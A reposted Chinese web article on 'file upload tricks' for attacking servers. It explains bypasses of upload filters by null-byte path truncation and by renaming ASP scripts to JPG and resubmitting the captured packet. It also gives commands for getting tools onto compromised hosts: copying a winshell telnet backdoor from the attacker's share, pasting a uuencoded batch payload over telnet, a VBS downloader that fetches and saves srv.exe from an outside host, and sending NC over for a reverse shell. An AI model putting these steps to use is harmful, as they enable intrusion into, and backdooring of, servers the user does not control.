首頁(yè) > 服務(wù)器 > Ftp服務(wù)器 > 正文

文件上傳技巧

2018-10-16 21:25:50
字體:
來(lái)源:轉載
供稿:網(wǎng)友

文件上傳是很早以前的事了,最早那會(huì )常用的就是IPC連接,然后一個(gè)一個(gè)的COPY,自從動(dòng)網(wǎng)upfile漏洞出來(lái)以后,各種腳本系統如PHP.JSP下的文件漏洞紛紛暴出,原理都是大同小異,沒(méi)有過(guò)濾文件上傳路徑,導致可以抓包然后把空格20改成00,變成空字符NULL,系統是從右往左識別的,所以到空字符那就截斷了,更簡(jiǎn)單的就是過(guò)濾文件上傳類(lèi)型不完整,改后綴就可以解決了,這些上傳文件的漏洞,用萬(wàn)能上傳工具就可以輕松搞定,不過(guò)漏洞文件名不同罷了。

還有一些另類(lèi)的文件上傳方法,是在系統做了比較好的防范下完成的,資料來(lái)源感謝CD-LION提供一。

先COPY個(gè)winshell.exe吧,開(kāi)個(gè)telnet端口,命令行下總比在瀏覽器里方便啊.

copy //myIP/c$/tools/winshell.exe d:/downloads/winzip32 已復制一個(gè)文件
啟動(dòng)它 d:/downloads/winzip32/winshell.exe 瀏覽器窗口會(huì )停好久,
不用等的,程序已經(jīng)啟動(dòng)了,點(diǎn)停止,接著(zhù),
斷開(kāi)共享連接: net use //myIP/c$ /del 完成
1利用telnet上傳文件 by :jiangyf@usa.net 

如果ftp被關(guān)了,sendmail也不行,如何把編譯好的文件上傳到主機呢? 
方法很簡(jiǎn)單: 
1.先把要上傳的文件用uuedcode進(jìn)行編碼,文件會(huì )變成大概下面的樣子: 
begin 644 file.bat 
M.C!J95@T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT4%]J 
M95@T85!9+7@M04%28#!@*CTP,’500D])04%!049+04]"4$E$34-"04Q%04I- 
M3D-"2D%,24%!14U-3D-"1D5’24=&0T%%3D="1T1(0T=02$=’2DA#2$9(1$-! 
M1TI(1$-!1T1’4$=.1TI’3T=(0T%#3T-/0T]#3T-/0T]!3D%+0T5!07%Q<7$@ 
M"D!%0TA/($]&1B`*0T]062`E,"Y"050@+T(@0SI<0D%45DE2+D-/32`O0B`O 
E62`*0SI<0D%45DE2+D-/32`*1$5,($,Z7$)!5%9)4BY#3TT@"@`` 

end 
sum -r/size 17903/262 
全部都是可見(jiàn)的ASCII字符了 

2.用TELNET連接到主機后輸入 
$ cat >a 
然后用WINODWS的拷貝/粘貼,把文件粘貼到telnet窗口 
按^d 
在當前目錄下產(chǎn)生文件a
3.uudecode a 
文件復原,然后chmod即可 

3腳本是非常好的東西,只要把源碼保存到一個(gè)文件中就能運行。所以在shell下,用 
echo語(yǔ)句直接寫(xiě)到一個(gè)文件中,在用相應的解釋程序執行就可以啦。這里是一個(gè)程序 
實(shí)例的簡(jiǎn)化: 
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbs 
echo xPost.Open "GET","http://167168.meibu.com/srv.exe";;,0 >>167168.vbs 
echo xPost.Send() >>167168.vbs 
echo Set sGet = CreateObject("ADODB.Stream") >>167168.vbs 
echo sGet.Mode = 3 >>167168.vbs 
echo sGet.Type = 1 >>167168.vbs 
echo sGet.Open() >>167168.vbs 
echo sGet.Write(xPost.responseBody) >>167168.vbs 
echo sGet.SaveToFile "srv.exe",2 >>167168.vbs 
然后執行cscript 167168.vbs就可以啦.其中,http://167168.meibu.com/srv.exe改成你放 
文件的網(wǎng)站路徑,srv.exe可以改成保存文件的路徑。 

4.start its:http://167168.meibu.com/ca.rar (看清楚,小心論壇自動(dòng)加的標簽) 
cd "C:/Documents and Settings/Default User/Local Settings/Temporary Internet Files/Content.IE5/" (假設系統裝在c盤(pán),且當前環(huán)境是SYSTEM。如果是用戶(hù)環(huán)境,修改Default User為該用戶(hù)名) 
dir /s ca[1].rar 
然后會(huì )顯示ca[1].rar的具體位置,比如C:/Documents and Settings/Default User/Local Settings/Temporary Internet Files/Content.IE5QMVC11H/ca[1].rar 
最后: 
copy 0QMVC11H/ca[1].rar c:/winnt/system32/ca.rar 
del 0QMVC11H/ca[1].rar 

還有可以用EXE2BAT轉換成批處理,再上傳,這種方法只限于小文件,文件太長(cháng)粘貼時(shí)會(huì )出錯,傳個(gè)NC做反向連接是不錯的選擇。
最近我還遇見(jiàn)一種校友錄系統,只有注冊后再能上傳照片(SESSION),我注冊后發(fā)現可以上傳任意文件,可是只能解析圖片類(lèi)型的后綴,這種情況應該是在服務(wù)端又加了一層JSP認正,如果用本地提交可以繞過(guò)JSP認正,可是沒(méi)有登陸,第一層SESSION驗證就不會(huì )通過(guò)了,上傳思路是把ASP文件改成JPG后綴上傳,然后抓包,這里的數據包已經(jīng)包含SESSION值了,再修改后綴為ASP,用NC提交,原理就是這樣,具體測試在進(jìn)行中..

發(fā)表評論 共有條評論
用戶(hù)名: 密碼:
驗證碼: 匿名發(fā)表